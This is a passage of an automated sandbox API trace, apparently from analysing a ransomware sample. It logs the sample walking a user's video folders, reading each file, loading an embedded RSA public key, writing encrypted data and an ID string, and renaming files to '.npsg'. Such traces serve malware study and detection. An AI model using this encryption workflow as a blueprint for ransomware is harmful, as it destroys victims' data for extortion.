nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa10*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0239.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.664] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.664] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.664] CloseHandle (hObject=0x644) returned 1 [0239.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8da60 [0239.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b89cd0 [0239.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8da60 | out: hHeap=0x620000) returned 1 [0239.666] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\Y1FygDtm\\TC3tPjd9xnk.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\y1fygdtm\\tc3tpjd9xnk.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\Y1FygDtm\\TC3tPjd9xnk.mkv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\y1fygdtm\\tc3tpjd9xnk.mkv.npsg")) returned 1 [0239.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89cd0 | out: hHeap=0x620000) returned 1 [0239.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.667] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0239.669] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xded898a0, ftCreationTime.dwHighDateTime=0x1d5bfaa, ftLastAccessTime.dwLowDateTime=0xd347fae0, ftLastAccessTime.dwHighDateTime=0x1d5b897, ftLastWriteTime.dwLowDateTime=0xd347fae0, ftLastWriteTime.dwHighDateTime=0x1d5b897, nFileSizeHigh=0x0, nFileSizeLow=0x12bcf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TC3tPjd9xnk.mkv", cAlternateFileName="TC3TPJ~1.MKV")) returned 0 [0239.669] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0239.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0239.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a6e8 | out: hHeap=0x620000) returned 1 [0239.669] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0239.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a6e8 [0239.669] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0239.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0239.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0239.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0239.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.675] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kYk5K01VVlQpw\\oMoJTci\\") returned="oMoJTci\\" [0239.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0239.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c43c0 [0239.675] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kYk5K01VVlQpw\\") returned="kYk5K01VVlQpw\\" [0239.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c5148 [0239.675] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0239.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86bd0 [0239.675] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0239.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0239.675] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0239.676] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0239.676] PathFindFileNameW (pszPath="") returned="" [0239.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.676] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kYk5K01VVlQpw\\oMoJTci\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9889740, ftCreationTime.dwHighDateTime=0x1d5c30f, ftLastAccessTime.dwLowDateTime=0x161f1630, ftLastAccessTime.dwHighDateTime=0x1d5ba25, ftLastWriteTime.dwLowDateTime=0x161f1630, ftLastWriteTime.dwHighDateTime=0x1d5ba25, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0239.676] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9889740, ftCreationTime.dwHighDateTime=0x1d5c30f, ftLastAccessTime.dwLowDateTime=0x161f1630, ftLastAccessTime.dwHighDateTime=0x1d5ba25, ftLastWriteTime.dwLowDateTime=0x161f1630, ftLastWriteTime.dwHighDateTime=0x1d5ba25, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0239.676] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd77484d0, ftCreationTime.dwHighDateTime=0x1d5bfae, ftLastAccessTime.dwLowDateTime=0x7585b6d0, ftLastAccessTime.dwHighDateTime=0x1d5b866, ftLastWriteTime.dwLowDateTime=0x7585b6d0, ftLastWriteTime.dwHighDateTime=0x1d5b866, nFileSizeHigh=0x0, nFileSizeLow=0xd0e8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GDvP_AvzlehYpg.mp4", cAlternateFileName="GDVP_A~1.MP4")) returned 1 [0239.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0239.676] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kYk5K01VVlQpw\\oMoJTci\\GDvP_AvzlehYpg.mp4") returned=".mp4" [0239.676] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kYk5K01VVlQpw\\oMoJTci\\GDvP_AvzlehYpg.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\kyk5k01vvlqpw\\omojtci\\gdvp_avzlehypg.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.677] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=53480) returned 1 [0239.677] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.680] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xd0c2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.680] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.682] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xd0e8, lpOverlapped=0x0) returned 1 [0239.683] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.683] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.683] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.683] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0239.684] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.684] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.684] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.685] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.685] GetLastError () returned 0x0 [0239.685] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.685] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0239.685] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.685] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.685] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.685] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.686] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xd0e8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.686] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.686] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.686] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.687] CloseHandle (hObject=0x644) returned 1 [0239.688] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kYk5K01VVlQpw\\oMoJTci\\GDvP_AvzlehYpg.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\kyk5k01vvlqpw\\omojtci\\gdvp_avzlehypg.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kYk5K01VVlQpw\\oMoJTci\\GDvP_AvzlehYpg.mp4.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\kyk5k01vvlqpw\\omojtci\\gdvp_avzlehypg.mp4.npsg")) returned 1 [0239.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89cd0 | out: hHeap=0x620000) returned 1 [0239.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.689] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0239.691] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, 